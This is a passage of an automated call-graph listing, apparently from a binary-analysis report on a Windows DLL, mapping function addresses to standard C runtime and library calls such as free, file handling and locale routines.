17291->17297 17292 18001b752 17293 180011058 free 3 API calls 17293->17298 17294 180011058 TlsGetValue TlsSetValue DecodePointer free 17294->17298 17299 18001b6bb 17295->17299 17296->17287 17300 180011058 free 3 API calls 17297->17300 17298->17292 17298->17294 17301 180011058 free 3 API calls 17299->17301 17300->17279 17301->17280 17303 180019254 _FF_MSGBANNER 7 API calls 17302->17303 17304 180010ca1 17303->17304 17305 1800192c8 _NMSG_WRITE 7 API calls 17304->17305 17306 180010ca8 17305->17306 17307 180010e70 doexit 9 API calls 17306->17307 17308 180010cb9 17307->17308 17310 18001b6e8 17309->17310 17311 180021ded 17309->17311 17310->17293 17312 180011058 free TlsGetValue TlsSetValue DecodePointer 17311->17312 17313 180021dfe 17312->17313 17314 180011058 free TlsGetValue TlsSetValue DecodePointer 17313->17314 17315 180021e07 17314->17315 17316 180011058 free TlsGetValue TlsSetValue DecodePointer 17315->17316 17317 180021e10 17316->17317 17318 180011058 free TlsGetValue TlsSetValue DecodePointer 17317->17318 17319 180021e19 17318->17319 17320 180011058 free TlsGetValue TlsSetValue DecodePointer 17319->17320 17321 180021e22 17320->17321 17322 180011058 free TlsGetValue TlsSetValue DecodePointer 17321->17322 17323 180021e2b 17322->17323 17324 180011058 free TlsGetValue TlsSetValue DecodePointer 17323->17324 17325 180021e33 17324->17325 17326 180011058 free TlsGetValue TlsSetValue DecodePointer 17325->17326 17327 180021e3c 17326->17327 17328 180011058 free TlsGetValue TlsSetValue DecodePointer 17327->17328 17329 180021e45 17328->17329 17330 180011058 free TlsGetValue TlsSetValue DecodePointer 17329->17330 17331 180021e4e 17330->17331 17332 180011058 free TlsGetValue TlsSetValue DecodePointer 17331->17332 17333 180021e57 17332->17333 17334 180011058 free TlsGetValue TlsSetValue DecodePointer 17333->17334 17335 180021e60 17334->17335 17336 180011058 free TlsGetValue TlsSetValue DecodePointer 17335->17336 17337 180021e69 17336->17337 17338 180011058 free TlsGetValue TlsSetValue DecodePointer 17337->17338 17339 180021e72 17338->17339 17340 180011058 free TlsGetValue TlsSetValue DecodePointer 17339->17340 17341 180021e7b 17340->17341 17342 180011058 free TlsGetValue TlsSetValue DecodePointer 17341->17342 17343 180021e84 17342->17343 17344 180011058 free TlsGetValue TlsSetValue DecodePointer 17343->17344 17345 180021e90 17344->17345 17346 180011058 free TlsGetValue TlsSetValue DecodePointer 17345->17346 17347 180021e9c 17346->17347 17348 180011058 free TlsGetValue TlsSetValue DecodePointer 17347->17348 17349 180021ea8 17348->17349 17350 180011058 free TlsGetValue TlsSetValue DecodePointer 17349->17350 17351 180021eb4 17350->17351 17352 180011058 free TlsGetValue TlsSetValue DecodePointer 17351->17352 17353 180021ec0 17352->17353 17354 180011058 free TlsGetValue TlsSetValue DecodePointer 17353->17354 17355 180021ecc 17354->17355 17356 180011058 free TlsGetValue TlsSetValue DecodePointer 17355->17356 17357 180021ed8 17356->17357 17358 180011058 free TlsGetValue TlsSetValue DecodePointer 17357->17358 17359 180021ee4 17358->17359 17360 180011058 free TlsGetValue TlsSetValue DecodePointer 17359->17360 17361 180021ef0 17360->17361 17362 180011058 free TlsGetValue TlsSetValue DecodePointer 17361->17362 17363 180021efc 17362->17363 17364 180011058 free TlsGetValue TlsSetValue DecodePointer 17363->17364 17365 180021f08 17364->17365 17366 180011058 free TlsGetValue TlsSetValue DecodePointer 17365->17366 17367 180021f14 17366->17367 17368 180011058 free TlsGetValue TlsSetValue DecodePointer 17367->17368 17369 180021f20 17368->17369 17370 180011058 free TlsGetValue TlsSetValue DecodePointer 17369->17370 17371 180021f2c 17370->17371 17372 180011058 free TlsGetValue TlsSetValue DecodePointer 17371->17372 17373 180021f38 17372->17373 17374 180011058 free TlsGetValue TlsSetValue DecodePointer 17373->17374 17375 180021f44 17374->17375 17376 180011058 free TlsGetValue TlsSetValue DecodePointer 17375->17376 17377 180021f50 17376->17377 17378 180011058 free TlsGetValue TlsSetValue DecodePointer 17377->17378 17379 180021f5c 17378->17379 17380 180011058 free TlsGetValue TlsSetValue DecodePointer 17379->17380 17381 180021f68 17380->17381 17382 180011058 free TlsGetValue TlsSetValue DecodePointer 17381->17382 17383 180021f74 17382->17383 17384 180011058 free TlsGetValue TlsSetValue DecodePointer 17383->17384 17385 180021f80 17384->17385 17386 180011058 free TlsGetValue TlsSetValue DecodePointer 17385->17386 17387 180021f8c 17386->17387 17388 180011058 free TlsGetValue TlsSetValue DecodePointer 17387->17388 17389 180021f98 17388->17389 17390 180011058 free TlsGetValue TlsSetValue DecodePointer 17389->17390 17391 180021fa4 17390->17391 17392 180011058 free TlsGetValue TlsSetValue DecodePointer 17391->17392 17393 180021fb0 17392->17393 17394 180011058 free TlsGetValue TlsSetValue DecodePointer 17393->17394 17395 180021fbc 17394->17395 17396 180011058 free TlsGetValue TlsSetValue DecodePointer 17395->17396 17397 180021fc8 17396->17397 17398 180011058 free TlsGetValue TlsSetValue DecodePointer 17397->17398 17399 180021fd4 17398->17399 17400 180011058 free TlsGetValue TlsSetValue DecodePointer 17399->17400 17401 180021fe0 17400->17401 17402 180011058 free TlsGetValue TlsSetValue DecodePointer 17401->17402 17403 180021fec 17402->17403 17404 180011058 free TlsGetValue TlsSetValue DecodePointer 17403->17404 17405 180021ff8 17404->17405 17406 180011058 free TlsGetValue TlsSetValue DecodePointer 17405->17406 17407 180022004 17406->17407 17408 180011058 free TlsGetValue TlsSetValue DecodePointer 17407->17408 17409 180022010 17408->17409 17410 180011058 free TlsGetValue TlsSetValue DecodePointer 17409->17410 17411 18002201c 17410->17411 17412 180011058 free TlsGetValue TlsSetValue DecodePointer 17411->17412 17413 180022028 17412->17413 17414 180011058 free TlsGetValue TlsSetValue DecodePointer 17413->17414 17415 180022034 17414->17415 17416 180011058 free TlsGetValue TlsSetValue DecodePointer 17415->17416 17417 180022040 17416->17417 17418 180011058 free TlsGetValue TlsSetValue DecodePointer 17417->17418 17419 18002204c 17418->17419 17420 180011058 free TlsGetValue TlsSetValue DecodePointer 17419->17420 17421 180022058 17420->17421 17422 180011058 free TlsGetValue TlsSetValue DecodePointer 17421->17422 17423 180022064 17422->17423 17424 180011058 free TlsGetValue TlsSetValue DecodePointer 17423->17424 17425 180022070 17424->17425 17426 180011058 free TlsGetValue TlsSetValue DecodePointer 17425->17426 17427 18002207c 17426->17427 17428 180011058 free TlsGetValue TlsSetValue DecodePointer 17427->17428 17429 180022088 17428->17429 17430 180011058 free TlsGetValue TlsSetValue DecodePointer 17429->17430 17431 180022094 17430->17431 17432 180011058 free TlsGetValue TlsSetValue DecodePointer 17431->17432 17433 1800220a0 17432->17433 17434 180011058 free TlsGetValue TlsSetValue DecodePointer 17433->17434 17435 1800220ac 17434->17435 17436 180011058 free TlsGetValue TlsSetValue DecodePointer 17435->17436 17437 1800220b8 17436->17437 17438 180011058 free TlsGetValue TlsSetValue DecodePointer 17437->17438 17439 1800220c4 17438->17439 17440 180011058 free TlsGetValue TlsSetValue DecodePointer 17439->17440 17441 1800220d0 17440->17441 17442 180011058 free TlsGetValue TlsSetValue DecodePointer 17441->17442 17443 1800220dc 17442->17443 17444 180011058 free TlsGetValue TlsSetValue DecodePointer 17443->17444 17445 1800220e8 17444->17445 17446 180011058 free TlsGetValue TlsSetValue DecodePointer 17445->17446 17447 1800220f4 17446->17447 17448 180011058 free TlsGetValue TlsSetValue DecodePointer 17447->17448 17449 180022100 17448->17449 17450 180011058 free TlsGetValue TlsSetValue DecodePointer 17449->17450 17451 18002210c 17450->17451 17452 180011058 free TlsGetValue TlsSetValue DecodePointer 17451->17452 17453 180022118 17452->17453 17454 180011058 free TlsGetValue TlsSetValue DecodePointer 17453->17454 17455 180022124 17454->17455 17456 180011058 free TlsGetValue TlsSetValue DecodePointer 17455->17456 17457 180022130 17456->17457 17458 180011058 free TlsGetValue TlsSetValue DecodePointer 17457->17458 17459 18002213c 17458->17459 17460 180011058 free TlsGetValue TlsSetValue DecodePointer 17459->17460 17461 180022148 17460->17461 17462 180011058 free TlsGetValue TlsSetValue DecodePointer 17461->17462 17463 180022154 17462->17463 17464 180011058 free TlsGetValue TlsSetValue DecodePointer 17463->17464 17465 180022160 17464->17465 17466 180011058 free TlsGetValue TlsSetValue DecodePointer 17465->17466 17467 18002216c 17466->17467 17468 180011058 free TlsGetValue TlsSetValue DecodePointer 17467->17468 17469 180022178 17468->17469 17470 180011058 free TlsGetValue TlsSetValue DecodePointer 17469->17470 17471 180022184 17470->17471 17472 180011058 free TlsGetValue TlsSetValue DecodePointer 17471->17472 17473 180022190 17472->17473 17474 180011058 free TlsGetValue TlsSetValue DecodePointer 17473->17474 17475 18002219c 17474->17475 17476 180011058 free TlsGetValue TlsSetValue DecodePointer 17475->17476 17477 1800221a8 17476->17477 17478 180011058 free TlsGetValue TlsSetValue DecodePointer 17477->17478 17479 1800221b4 17478->17479 17480 180011058 free TlsGetValue TlsSetValue DecodePointer 17479->17480 17481 1800221c0 17480->17481 17482 180011058 free TlsGetValue TlsSetValue DecodePointer 17481->17482 17483 1800221cc 17482->17483 17484 180011058 free TlsGetValue TlsSetValue DecodePointer 17483->17484 17484->17310 17486 18001d920 17485->17486 17487 18001d931 17486->17487 17488 18001d94a 17486->17488 17504 18001d925 17486->17504 17490 180015dc8 _errno 3 API calls 17487->17490 17489 18001230c _LocaleUpdate::_LocaleUpdate 16 API calls 17488->17489 17491 18001d956 17489->17491 17493 18001d936 17490->17493 17494 18001db40 17491->17494 17497 18001d95f 17491->17497 17492 180012200 std::system_error::system_error IsProcessorFeaturePresent 17495 18001dbf3 17492->17495 17496 180016cfc _invalid_parameter_noinfo 2 API calls 17493->17496 17498 18001db4d 17494->17498 17503 18001da37 __crtGetLocaleInfoA_stat _read_nolock 17494->17503 17495->17216 17495->17219 17496->17504 17499 18001d96c __crtGetLocaleInfoA_stat 17497->17499 17497->17503 17501 180015dc8 _errno 3 API calls 17498->17501 17498->17504 17502 180015dc8 _errno 3 API calls 17499->17502 17499->17504 17500 180015dc8 _errno 3 API calls 17500->17504 17501->17504 17502->17504 17503->17500 17503->17504 17504->17492 17535 18000e703 17534->17535 17536 180002a6a 17534->17536 17537 180015264 setlocale 16 API calls 17535->17537 17536->17110 17536->17111 17537->17536 17539 18000e984 17538->17539 17540 18000ea1a 17539->17540 17545 18000e9fa 17539->17545 17560 1800155f4 17539->17560 17541 1800155f4 _wfsopen 22 API calls 17540->17541 17540->17545 17542 18000ea3c 17541->17542 17542->17545 17577 180015580 17542->17577 17545->16991 17547 180001d1e std::_Lockit::_Lockit 17546->17547 17549 18000df9c std::_Lockit::~_Lockit LeaveCriticalSection 17547->17549 17551 180001d6d 17547->17551 17548 18000df9c std::_Lockit::~_Lockit LeaveCriticalSection 17550 180001e17 17548->17550 17549->17551 17550->16993 17559 180001db4 17551->17559 17791 1800043ec 17551->17791 17554 18001176c std::bad_exception::bad_exception 5 API calls 17555 180001ddd 17554->17555 17556 180011998 _CxxThrowException 2 API calls 17555->17556 17558 180001dee 17556->17558 17557 18000e538 std::_Facet_Register 6 API calls 17557->17559 17558->17557 17559->17548 17561 180015625 17560->17561 17562 18001563c 17560->17562 17563 180015dc8 _errno 3 API calls 17561->17563 17562->17561 17565 180015657 17562->17565 17564 18001562a 17563->17564 17566 180016cfc _invalid_parameter_noinfo 2 API calls 17564->17566 17586 18001dcfc 17565->17586 17576 180015635 _ioinit 17566->17576 17568 18001565c 17569 180015676 17568->17569 17570 180015669 17568->17570 17571 18001567c 17569->17571 17572 18001569e 17569->17572 17573 180015dc8 _errno 3 API calls 17570->17573 17574 180015dc8 _errno 3 API calls 17571->17574 17594 18001e310 17572->17594 17573->17576 17574->17576 17576->17540 17578 1800155a8 17577->17578 17579 1800155bd 17577->17579 17581 180015dc8 _errno 3 API calls 17578->17581 17579->17578 17580 1800155c3 17579->17580 17647 1800154d4 17580->17647 17582 1800155ad 17581->17582 17583 180016cfc _invalid_parameter_noinfo 2 API calls 17582->17583 17585 1800155b8 17583->17585 17585->17545 17592 18001dd15 17586->17592 17587 18001dd91 17587->17568 17588 18001dd9d 17588->17587 17616 180015828 17588->17616 17591 18001ddce EnterCriticalSection 17591->17587 17592->17587 17592->17588 17609 1800102ec 17592->17609 17612 180010370 17592->17612 17603 18001e355 _wopenfile 17594->17603 17595 18001e377 17597 180015dc8 _errno 3 API calls 17595->17597 17596 18001e523 17596->17595 17599 18001e58b 17596->17599 17598 18001e37c 17597->17598 17600 180016cfc _invalid_parameter_noinfo 2 API calls 17598->17600 17634 180024c18 17599->17634 17601 18001e387 17600->17601 17601->17576 17603->17595 17603->17596 17619 180024c4c 17603->17619 17605 18001e51f 17605->17596 17606 180024c4c LangCountryEnumProc 16 API calls 17605->17606 17607 18001e542 17606->17607 17607->17596 17608 180024c4c LangCountryEnumProc 16 API calls 17607->17608 17608->17596 17610 1800102fa 17609->17610 17611 18001030d EnterCriticalSection 17609->17611 17610->17592 17613 180010382 LeaveCriticalSection 17612->17613 17614 180010375 17612->17614 17615 1800131e4 LeaveCriticalSection 17613->17615 17614->17615 17617 180015843 InitializeCriticalSectionAndSpinCount 17616->17617 17618 18001583c 17616->17618 17617->17591 17618->17617 17620 180024c62 17619->17620 17622 180024cda 17619->17622 17621 180015dc8 _errno 3 API calls 17620->17621 17632 180024c8b 17620->17632 17624 180024c71 17621->17624 17623 180024d1a 17622->17623 17626 180024d39 17622->17626 17633 180024d2a 17622->17633 17625 180015dc8 _errno 3 API calls 17623->17625 17627 180016cfc _invalid_parameter_noinfo 2 API calls 17624->17627 17628 180024d1f 17625->17628 17629 18001230c _LocaleUpdate::_LocaleUpdate 16 API calls 17626->17629 17630 180024c7c 17627->17630 17631 180016cfc _invalid_parameter_noinfo 2 API calls 17628->17631 17629->17633 17630->17605 17631->17633 17632->17605 17633->17605 17637 180024380 17634->17637 17638 1800243ae 17637->17638 17640 1800243c6 17637->17640 17639 180015dc8 _errno 3 API calls 17638->17639 17641 1800243b3 17639->17641 17640->17638 17644 1800243f3 17640->17644 17642 180016cfc _invalid_parameter_noinfo 2 API calls 17641->17642 17643 1800243bf 17642->17643 17643->17601 17644->17643 17646 18001ee74 LeaveCriticalSection 17644->17646 17648 180015507 17647->17648 17649 1800154f7 17647->17649 17654 18001551a 17648->17654 17659 18001de34 17648->17659 17650 180015dc8 _errno 3 API calls 17649->17650 17653 1800154fc 17650->17653 17653->17585 17685 18000ee28 17654->17685 17660 18001de56 17659->17660 17661 18001de75 17660->17661 17662 18001de8d 17660->17662 17663 180015dc8 _errno 3 API calls 17661->17663 17664 180016d58 _fileno 5 API calls 17662->17664 17665 18001de7a 17663->17665 17666 18001de92 17664->17666 17667 180016cfc _invalid_parameter_noinfo 2 API calls 17665->17667 17668 18001e148 _lseek 11 API calls 17666->17668 17684 18001de85 17667->17684 17669 18001deaa 17668->17669 17672 18001e023 17669->17672 17673 18001df05 17669->17673 17669->17684 17670 180012200 std::system_error::system_error IsProcessorFeaturePresent 17671 18001e124 17670->17671 17671->17654 17674 18001e027 17672->17674 17678 18001dff9 17672->17678 17676 18001df1a 17673->17676 17673->17678 17675 180015dc8 _errno 3 API calls 17674->17675 17675->17684 17676->17684 17715 1800182cc 17676->17715 17679 18001e148 _lseek 11 API calls 17678->17679 17678->17684 17680 18001e06d 17679->17680 17681 18001e148 _lseek 11 API calls 17680->17681 17680->17684 17681->17684 17682 18001df36 _read_nolock 17683 18001e148 _lseek 11 API calls 17682->17683 17682->17684 17683->17684 17684->17670 17686 18000ee6a 17685->17686 17687 18000ee45 17685->17687 17691 180016d58 17686->17691 17687->17686 17688 180016d58 _fileno 5 API calls 17687->17688 17689 18000ee5c 17688->17689 17761 180017010 17689->17761 17692 180016d61 17691->17692 17693 180015552 17691->17693 17694 180015dc8 _errno 3 API calls 17692->17694 17697 18001e148 17693->17697 17695 180016d66 17694->17695 17696 180016cfc _invalid_parameter_noinfo 2 API calls 17695->17696 17696->17693 17698 18001e183 17697->17698 17699 18001e16b 17697->17699 17700 18001e1fc 17698->17700 17702 18001e1b6 17698->17702 17701 180015dc8 _errno 3 API calls 17699->17701 17704 180015dc8 _errno 3 API calls 17700->17704 17710 18001e178 17701->17710 17703 18001ea14 __lock_fhandle 2 API calls 17702->17703 17705 18001e1bd 17703->17705 17706 18001e209 17704->17706 17707 18001e1ca 17705->17707 17708 18001e1db 17705->17708 17709 180016cfc _invalid_parameter_noinfo 2 API calls 17706->17709 17777 18001e22c 17707->17777 17712 180015dc8 _errno 3 API calls 17708->17712 17709->17710 17710->17653 17713 18001e1d7 17712->17713 17790 18001ee74 LeaveCriticalSection 17713->17790 17716 1800182ef 17715->17716 17718 180018307 17715->17718 17720 180015dc8 _errno 3 API calls 17716->17720 17717 180018383 17721 180015dc8 _errno 3 API calls 17717->17721 17718->17717 17719 18001833a 17718->17719 17733 18001ea14 17719->17733 17732 1800182fc 17720->17732 17723 180018390 17721->17723 17725 180016cfc _invalid_parameter_noinfo 2 API calls 17723->17725 17724 180018341 17726 18001834e 17724->17726 17727 180018360 17724->17727 17725->17732 17738 1800183b4 17726->17738 17729 180015dc8 _errno 3 API calls 17727->17729 17730 18001835b 17729->17730 17747 18001ee74 LeaveCriticalSection 17730->17747 17732->17682 17734 18001ea80 EnterCriticalSection 17733->17734 17736 18001ea4c 17733->17736 17734->17724 17735 18001ea72 17735->17734 17736->17735 17737 180015828 _ioinit InitializeCriticalSectionAndSpinCount 17736->17737 17737->17735 17748 18001ed50 17738->17748 17741 1800183ea SetFilePointerEx 17743 180018402 _read_nolock 17741->17743 17745 1800183de 17741->17745 17742 1800183d9 17744 180015dc8 _errno 3 API calls 17742->17744 17756 180015d78 17743->17756 17744->17745 17745->17730 17749 18001ed59 17748->17749 17751 18001ed6e 17748->17751 17750 180015dc8 _errno 3 API calls 17749->17750 17752 1800183d3 17750->17752 17751->17752 17753 180015dc8 _errno 3 API calls 17751->17753 17752->17741 17752->17742 17754 18001edb0 17753->17754 17755 180016cfc _invalid_parameter_noinfo 2 API calls 17754->17755 17755->17752 17757 18001a380 _getptd_noexit 3 API calls 17756->17757 17758 180015d89 17757->17758 17759 18001a380 _getptd_noexit 3 API calls 17758->17759 17760 180015da2 _dosmaperr 17759->17760 17760->17745 17762 180017033 17761->17762 17763 18001704b 17761->17763 17765 180015dc8 _errno 3 API calls 17762->17765 17764 1800170c4 17763->17764 17766 18001707e 17763->17766 17768 180015dc8 _errno 3 API calls 17764->17768 17767 180017040 17765->17767 17769 18001ea14 __lock_fhandle 2 API calls 17766->17769 17767->17686 17770 1800170d1 17768->17770 17771 180017085 17769->17771 17772 180016cfc _invalid_parameter_noinfo 2 API calls 17770->17772 17773 180015dc8 _errno 3 API calls 17771->17773 17774 180017092 17771->17774 17772->17767 17773->17774 17776 18001ee74 LeaveCriticalSection 17774->17776 17778 18001ed50 _get_osfhandle 5 API calls 17777->17778 17779 18001e250 17778->17779 17780 18001e259 17779->17780 17781 18001e26c SetFilePointerEx 17779->17781 17783 180015dc8 _errno 3 API calls 17780->17783 17782 18001e295 SetFilePointerEx 17781->17782 17784 18001e286 _read_nolock 17781->17784 17782->17784 17785 18001e2ad 17782->17785 17787 18001e25e 17783->17787 17788 180015d78 _dosmaperr 3 API calls 17784->17788 17786 18001e2b4 SetFilePointerEx 17785->17786 17785->17787 17789 180015dc8 _errno 3 API calls 17786->17789 17787->17713 17788->17787 17789->17787 17792 180001dc6 17791->17792 17793 180004420 17791->17793 17792->17554 17792->17558 17793->17792 17794 18000eb24 std::ios_base::_Init 6 API calls 17793->17794 17796 18000442d 17794->17796 17795 180004465 17795->17792 17798 180002a5c ctype 16 API calls 17795->17798 17796->17795 17797 18000234c std::_Locinfo::_Locinfo 18 API calls 17796->17797 17797->17795 17798->17792 17800 18000265e std::system_error::system_error 17799->17800 17813 18000547c 17800->17813 17802 180002676 17820 1800023f8 17802->17820 17804 180002692 17805 180012200 std::system_error::system_error IsProcessorFeaturePresent 17804->17805 17806 1800026bf 17805->17806 17806->17004 17810 18000428f _ld12tod 17807->17810 17812 1800042a9 17807->17812 17808 180012200 std::system_error::system_error IsProcessorFeaturePresent 17809 1800043d2 17808->17809 17809->17012 17810->17812 17855 18000f688 17810->17855 17812->17808 17814 1800054e5 17813->17814 17816 180005499 17813->17816 17829 180004594 17814->17829 17816->17814 17817 1800054c0 17816->17817 17818 180005394 std::_System_error::_System_error 8 API calls 17817->17818 17819 1800054e3 memcpy_s 17818->17819 17819->17802 17821 180005394 std::_System_error::_System_error 8 API calls 17820->17821 17822 180002449 17821->17822 17851 180004b50 17822->17851 17825 180011798 std::exception::exception 5 API calls 17826 18000247d 17825->17826 17827 180012200 std::system_error::system_error IsProcessorFeaturePresent 17826->17827 17828 1800024b8 17827->17828 17828->17804 17830 180004651 17829->17830 17832 1800045bd 17829->17832 17842 18000e104 17830->17842 17835 1800045ce memcpy_s 17832->17835 17836 180004024 17832->17836 17835->17819 17837 18000405d 17836->17837 17838 1800040aa 17837->17838 17839 18000eb24 std::ios_base::_Init 6 API calls 17837->17839 17841 1800040b7 memcpy_s 17837->17841 17838->17841 17847 18000e0c0 17838->17847 17839->17838 17841->17835 17843 180011798 std::exception::exception 5 API calls 17842->17843 17844 18000e11c 17843->17844 17845 180011998 _CxxThrowException 2 API calls 17844->17845 17846 18000e139 17845->17846 17848 18000e0e5 std::_Xbad_alloc 17847->17848 17849 180011998 _CxxThrowException 2 API calls 17848->17849 17850 18000e102 17849->17850 17852 180004b8a std::system_error::system_error std::_System_error::_System_error 17851->17852 17853 180012200 std::system_error::system_error IsProcessorFeaturePresent 17852->17853 17854 180002462 17853->17854 17854->17825 17856 18000f6b2 17855->17856 17863 18000f6d3 17855->17863 17857 18000f6c3 17856->17857 17858 18000f6d5 17856->17858 17856->17863 17859 180015dc8 _errno 3 API calls 17857->17859 17864 18000f4f8 17858->17864 17860 18000f6c8 17859->17860 17861 180016cfc _invalid_parameter_noinfo 2 API calls 17860->17861 17861->17863 17863->17810 17866 18000f526 17864->17866 17870 18000f540 17864->17870 17865 18000f530 17867 180015dc8 _errno 3 API calls 17865->17867 17866->17865 17866->17870 17873 18000f572 memcpy_s 17866->17873 17868 18000f535 17867->17868 17869 180016cfc _invalid_parameter_noinfo 2 API calls 17868->17869 17869->17870 17870->17863 17871 18000ee28 _flush 8 API calls 17871->17873 17872 180016d58 _fileno 5 API calls 17872->17873 17873->17870 17873->17871 17873->17872 17874 180017010 _write 8 API calls 17873->17874 17874->17873 17879 1800052aa 17875->17879 17876 180005386 17878 18000e104 std::_System_error::_System_error 7 API calls 17876->17878 17877 18000530d 17881 180004660 8 API calls 17877->17881 17882 1800052d5 memcpy_s 17877->17882 17880 180005392 17878->17880 17879->17876 17879->17877 17879->17882 17881->17882 17882->16929 17884 180004692 17883->17884 17885 180004728 17883->17885 17886 1800046a3 memcpy_s 17884->17886 17890 180004128 17884->17890 17887 18000e104 std::_System_error::_System_error 7 API calls 17885->17887 17886->16925 17889 180004734 17887->17889 17889->16925 17892 180004166 17890->17892 17891 1800041c1 17894 18000e0c0 std::_Xbad_alloc 2 API calls 17891->17894 17895 1800041ce memcpy_s 17891->17895 17892->17891 17893 18000eb24 std::ios_base::_Init 6 API calls 17892->17893 17892->17895 17893->17891 17894->17895 17895->17886 17897 1800077ba 17896->17897 17900 180007742 memcpy_s 17896->17900 17898 18000e13c std::_System_error::_System_error 7 API calls 17897->17898 17899 1800077c6 17898->17899 17900->16943 17902 180011798 std::exception::exception 5 API calls 17901->17902 17903 18000e154 17902->17903 17904 180011998 _CxxThrowException 2 API calls 17903->17904 17905 18000e171 17904->17905 17907 18000810b 17906->17907 17914 1800080ba 17906->17914 17908 1800081d7 17907->17908 17909 180008118 17907->17909 17912 18000e13c std::_System_error::_System_error 7 API calls 17908->17912 17910 1800081e3 17909->17910 17911 180008128 17909->17911 17913 18000e104 std::_System_error::_System_error 7 API calls 17910->17913 17916 180004594 std::_System_error::_System_error 8 API calls 17911->17916 17919 180008106 memcpy_s 17911->17919 17912->17910 17915 1800081f0 17913->17915 17914->17907 17917 1800080e1 17914->17917 17916->17919 17920 180007f18 17917->17920 17919->16953 17921 180008080 17920->17921 17922 180007f49 17920->17922 17923 18000e13c std::_System_error::_System_error 7 API calls 17921->17923 17922->17921 17924 180008074 17922->17924 17925 180007f75 17922->17925 17931 18000808d 17923->17931 17926 18000e104 std::_System_error::_System_error 7 API calls 17924->17926 17927 180004594 std::_System_error::_System_error 8 API calls 17925->17927 17941 180007f90 memcpy_s 17925->17941 17926->17921 17927->17941 17928 18000810b 17929 1800081d7 17928->17929 17930 180008118 17928->17930 17934 18000e13c std::_System_error::_System_error 7 API calls 17929->17934 17932 1800081e3 17930->17932 17933 180008128 17930->17933 17931->17928 17938 1800080e1 17931->17938 17935 18000e104 std::_System_error::_System_error 7 API calls 17932->17935 17937 180004594 std::_System_error::_System_error 8 API calls 17933->17937 17940 180008106 memcpy_s 17933->17940 17934->17932 17936 1800081f0 17935->17936 17937->17940 17939 180007f18 8 API calls 17938->17939 17939->17940 17940->17919 17941->17919 17944 180002592 17942->17944 17943 18000127c 17943->16962 17943->16963 17944->17943 17950 180007a80 17944->17950 17947 180004c7c 17946->17947 17948 180004c40 17946->17948 17947->16964 17948->17947 17949 1800069ac std::ios_base::_Init 11 API calls 17948->17949 17949->17947 17951 180007aa5 17950->17951 17952 180007b0a 17950->17952 17953 180002560 11 API calls 17951->17953 17952->17943 17954 180007ab2 17953->17954 17955 180007af6 17954->17955 17956 1800069ac std::ios_base::_Init 11 API calls 17954->17956 17955->17952 17957 180004c20 11 API calls 17955->17957 17956->17955 17957->17952 17959 180002560 11 API calls 17958->17959 17961 180008d8f 17959->17961 17960 1800069ac std::ios_base::_Init 11 API calls 17962 180008e3b 17960->17962 17961->17960 17961->17962 17963 180001a8f 17962->17963 17964 180004c20 11 API calls 17962->17964 17963->16972 17964->17963 17965 1800246dc 17966 1800246ea 17965->17966 17967 180024724 _read_nolock 17965->17967 17966->17967 17997 180024290 17966->17997 17969 180015d78 _dosmaperr 3 API calls 17967->17969 17970 180024769 GetFileType 17967->17970 17971 18002475d 17969->17971 17972 1800247c2 17970->17972 17973 180015dc8 _errno 3 API calls 17971->17973 18001 18001edc4 17972->18001 17974 180024762 17973->17974 17974->17970 17975 180024a2a 17974->17975 17977 1800247e1 17978 1800183b4 _lseeki64_nolock 6 API calls 17977->17978 17982 180024a06 __termconin 17977->17982 17985 180024868 17977->17985 17979 180024851 17978->17979 17979->17985 18021 18001f1d4 17979->18021 17982->17975 17983 180024290 __createFile CreateFileW 17982->17983 17989 180024ba7 _read_nolock 17983->17989 17984 18001f1d4 _read_nolock 7 API calls 17984->17985 17985->17982 17985->17984 17986 180017010 _write 8 API calls 17985->17986 17987 180024a1e 17985->17987 17988 1800183b4 6 API calls _lseeki64_nolock 17985->17988 18008 180016e44 17985->18008 17986->17985 17990 180016e44 _close_nolock 6 API calls 17987->17990 17988->17985 17989->17975 17991 180015d78 _dosmaperr 3 API calls 17989->17991 17992 180024a25 17990->17992 17993 180024bba 17991->17993 17994 180015dc8 _errno 3 API calls 17992->17994 18064 18001eca4 17993->18064 17994->17975 17996 180024bdc 17996->17996 17998 1800242b4 17997->17998 17999 180024333 CreateFileW 17998->17999 18000 1800242b8 _init_pointers 17998->18000 17999->18000 18000->17967 18002 18001ee45 18001->18002 18003 18001ede0 18001->18003 18004 180015dc8 _errno 3 API calls 18002->18004 18003->18002 18006 18001ee0b 18003->18006 18005 18001ee39 18004->18005 18005->17977 18006->18005 18007 18001ee33 SetStdHandle 18006->18007 18007->18005 18009 18001ed50 _get_osfhandle 5 API calls 18008->18009 18010 180016e58 18009->18010 18011 180016e94 18010->18011 18015 18001ed50 _get_osfhandle 5 API calls 18010->18015 18017 180016ea0 _read_nolock __termconin 18010->18017 18013 18001ed50 _get_osfhandle 5 API calls 18011->18013 18011->18017 18012 18001eca4 _free_osfhnd 4 API calls 18014 180016ec0 18012->18014 18013->18017 18018 180016eec 18014->18018 18019 180015d78 _dosmaperr 3 API calls 18014->18019 18016 180016e87 18015->18016 18020 18001ed50 _get_osfhandle 5 API calls 18016->18020 18017->18012 18018->17985 18019->18018 18020->18011 18022 18001f225 18021->18022 18023 18001f20e 18021->18023 18024 18001fa19 18022->18024 18031 18001f267 18022->18031 18025 180015dc8 _errno 3 API calls 18023->18025 18027 180015dc8 _errno 3 API calls 18024->18027 18041 18001f21a 18025->18041 18026 18001f26f 18030 180015dc8 _errno 3 API calls 18026->18030 18028 18001f27b 18027->18028 18029 180016cfc _invalid_parameter_noinfo 2 API calls 18028->18029 18029->18041 18030->18028 18031->18026 18032 18001f2b6 18031->18032 18033 18001f2d2 18031->18033 18031->18041 18032->18026 18034 18001f2c2 18032->18034 18035 18001f305 18033->18035 18036 18001f2ea 18033->18036 18071 18001eea0 18034->18071 18040 1800183b4 _lseeki64_nolock 6 API calls 18035->18040 18038 180015dc8 _errno 3 API calls 18036->18038 18038->18041 18040->18034 18041->17985 18042 18001f412 GetConsoleMode 18043 18001f427 _read_nolock 18042->18043 18044 18001f9df _read_nolock 18043->18044 18045 18001f42d _read_nolock 18043->18045 18046 18001f470 18043->18046 18047 18001f45b _read_nolock 18044->18047 18048 18001f9ea 18044->18048 18045->18046 18045->18047 18052 18001f468 18046->18052 18057 18001f78f _read_nolock 18046->18057 18058 18001f4ea _read_nolock 18046->18058 18050 180015d78 _dosmaperr 3 API calls 18047->18050 18047->18052 18049 180015dc8 _errno 3 API calls 18048->18049 18049->18052 18050->18052 18051 180011058 free 3 API calls 18051->18041 18052->18041 18052->18051 18053 18001f62a 18053->18052 18054 18001f6b9 18053->18054 18055 18001f6a9 18053->18055 18059 18001f66e _read_nolock 18053->18059 18054->18059 18060 1800183b4 